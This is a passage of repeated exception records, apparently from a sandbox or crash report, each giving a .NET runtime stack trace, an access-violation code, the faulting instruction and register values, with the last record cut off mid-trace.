__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x82d1b9 0x82cfbb 0x827ad8 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x82d2f0 registers.esp: 2944916 registers.edi: 2944968 registers.eax: 0 registers.ebp: 2944980 registers.edx: 3352872 registers.ebx: 2946412 registers.esi: 40040076 registers.ecx: 0	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49b74f4 0x49b6d8a 0x49b6c5d 0x49b5513 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943444 registers.edi: 2943788 registers.eax: 0 registers.ebp: 2943452 registers.edx: 0 registers.ebx: 2946412 registers.esi: 40820760 registers.ecx: 41947236	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49b74f4 0x49b6d8a 0x49b6c75 0x49b5513 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943444 registers.edi: 2943788 registers.eax: 0 registers.ebp: 2943452 registers.edx: 0 registers.ebx: 2946412 registers.esi: 40820760 registers.ecx: 43251928	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49b74f4 0x49b6d8a 0x49b6c75 0x49b5513 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943444 registers.edi: 2943788 registers.eax: 0 registers.ebp: 2943452 registers.edx: 0 registers.ebx: 2946412 registers.esi: 40820760 registers.ecx: 40704552	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bc096 0x49bb951 0x49b6c5d 0x49b57fc 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943420 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943428 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39641992 registers.ecx: 42013392	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bc096 0x49bb951 0x49b6c75 0x49b57fc 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943420 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943428 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39641992 registers.ecx: 43360144	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bc096 0x49bb951 0x49b6c75 0x49b57fc 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943420 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943428 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39641992 registers.ecx: 44779480	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bc9c2 0x49bc369 0x49b6c5d 0x49b5914 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943472 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943480 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39641992 registers.ecx: 39878352	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bc9c2 0x49bc369 0x49b6c75 0x49b5914 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943472 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943480 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39620428 registers.ecx: 41272288	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bc9c2 0x49bc369 0x49b6c75 0x49b5914 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943472 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943480 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39620428 registers.ecx: 42665936	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bd0d4 0x49bcb31 0x49b6c5d 0x49b5a1a 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943504 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943512 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39620428 registers.ecx: 44059720	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bd0d4 0x49bcb31 0x49b6c75 0x49b5a1a 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943504 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943512 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39620428 registers.ecx: 40841184	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49bd0d4 0x49bcb31 0x49b6c75 0x49b5a1a 0x49b46a9 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2943504 registers.edi: 2943812 registers.eax: 0 registers.ebp: 2943512 registers.edx: 0 registers.ebx: 2946412 registers.esi: 39620428 registers.ecx: 42237456	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x49bb588 0x49be45b 0x49bda06 0x49b4701 0x82d9ff 0x827c1d 0x8272d3 0x823c6b 0x8235d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x49bb5cb registers.esp: 2944324 registers.edi: 2944588 registers.eax: 0 registers.ebp: 2944332 registers.edx: 0 registers.ebx: 2946412 registers.esi: 42806364 registers.ecx: 42813340	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x7bd391 0x7bd193 0x7b7ad8 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 